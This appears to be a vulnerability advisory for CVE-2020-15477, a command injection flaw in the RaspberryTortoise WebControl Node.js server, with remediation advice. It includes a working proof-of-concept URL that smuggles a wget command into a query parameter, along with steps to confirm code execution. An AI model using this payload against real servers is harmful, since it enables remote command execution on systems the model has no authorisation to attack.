CVE-2020-15477

An attacker sends an HTTP request to one of the WebControl endpoints (e.g., `/backward?0.05;wget${IFS}127.0.0.1/abcd`) [ref_id=1]. The `incomingString` parameter is concatenated into a shell command via `child_process.exec` without sanitization, allowing shell metacharacters such as `;` to inject arbitrary commands [ref_id=1]. The attack is remote and requires only network access to the RaspberryTortoise WebControl server [ref_id=1].

The vulnerable file is `nodejs/raspberryTortoise.js`. The parameter `incomingString` is passed directly to `child_process.exec` without any validation or sanitization [ref_id=1]. The affected components are the HTTP endpoints `backward`, `forward`, `left`, and `right` [ref_id=1].

No patch is provided in the bundle. The advisory recommends that input validation be added to `nodejs/raspberryTortoise.js` so that the `incomingString` parameter is sanitized before being passed to `child_process.exec` [ref_id=1]. Using `child_process.execFile` or `child_process.spawn` with an argument array instead of a shell string would also prevent shell metacharacter injection [ref_id=1].

1. Start the RaspberryTortoise WebControl as described at https://github.com/raspberrytorte/tortoise/tree/master/nodejs [ref_id=1]. 2. Start a local HTTP server (e.g., `python3 -m http.server 80`) to observe the callback [ref_id=1]. 3. Visit `http://127.0.0.1:8080/backward?0.05;wget${IFS}127.0.0.1/abcd` [ref_id=1]. 4. A request will be received on the local HTTP server, confirming code execution [ref_id=1]. The same technique works on `/forward`, `/left`, and `/right` endpoints [ref_id=1].